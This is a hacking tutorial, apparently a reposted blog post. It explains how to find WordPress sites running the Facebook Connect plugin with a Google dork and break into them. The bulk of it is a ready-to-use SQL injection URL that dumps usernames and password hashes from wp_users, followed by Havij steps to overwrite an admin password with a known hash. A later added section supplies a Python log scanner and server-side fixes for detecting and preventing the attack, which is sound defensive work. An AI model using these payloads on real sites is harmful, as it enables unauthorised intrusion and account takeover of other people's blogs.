Many people use the Facebook Connect WordPress plugin on their blogs. They think it's cool, but it could be a big security hole. Here's the way to hack these sites.
Step 1: http://www.google.com
Step 2: Now enter this dork to find sites with the security hole.
inurl:"fbconnect_action=myhome"
You will find something like that.
Step 4: Now replace
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5: Now you have the username and password.
Step 6: The password is encrypted with WordPress md5 (blowfish). You need to decode this.
Step 7: Then find the administrator panel. Normally it should be in
www.victrimsite.com/wp-admin
or www.victrimsite.com/wp-login.php
Note: Decoding this type of password may take a long time.
So here is another way to hack the password.
Step 1: Open Havij and paste the blog URL you are going to hack.
Example:
http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 2: Now find Databases, Tables.
Step 3: Select wp-users, then tick all columns. Then click on Get Data.
Step 4: You will find something like that.
Step 5: Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/
Step 6: Now log in with the password hackintruths.
credits to: Devilscafe.in
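Seen from the defending side, the request in Step 4 stands out in web server logs, because the id parameter on `fbconnect_action=myhome` should only ever be a number. The following is an added example (not from the original post or from the plugin) that flags such requests in combined-format access log lines; the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# SQL fragments of the kind the post's Step 4 places in the id parameter.
SQL_TOKENS = re.compile(r"\b(?:union|select|concat|from)\b|--|0x[0-9a-f]+", re.I)
ID_PARAMS = ("fbuserid", "userid")  # id parameters named in the post

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /?fbconnect_action=myhome&userid=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:02:11 +0000] '
    '"GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,'
    'concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--'
    ' HTTP/1.1" 200 4811',
    '198.51.100.9 - - [01/Jan/2024:10:03:40 +0000] '
    '"GET /wp-login.php HTTP/1.1" 200 2301',
]


def inspect_line(line):
    """Return a finding for a suspicious fbconnect request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # parse_qs URL-decodes, so '+' and %28/%29 encodings are normalised first.
    query = parse_qs(urlsplit(m["target"]).query)
    if "myhome" not in query.get("fbconnect_action", []):
        return None
    for name in ID_PARAMS:
        for value in query.get(name, []):
            if value.isascii() and value.isdigit():
                continue  # a plain numeric id is the only expected shape
            tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
            return {"ip": m["ip"], "param": name, "tokens": tokens,
                    "severity": "high" if tokens else "medium"}
    return None


def scan(lines):
    """Collect findings for every flagged line, in log order."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Log matching only shows that the parameter was probed; the durable fix is on the server side, where the id must be cast to an integer or bound through a prepared statement before it reaches the query.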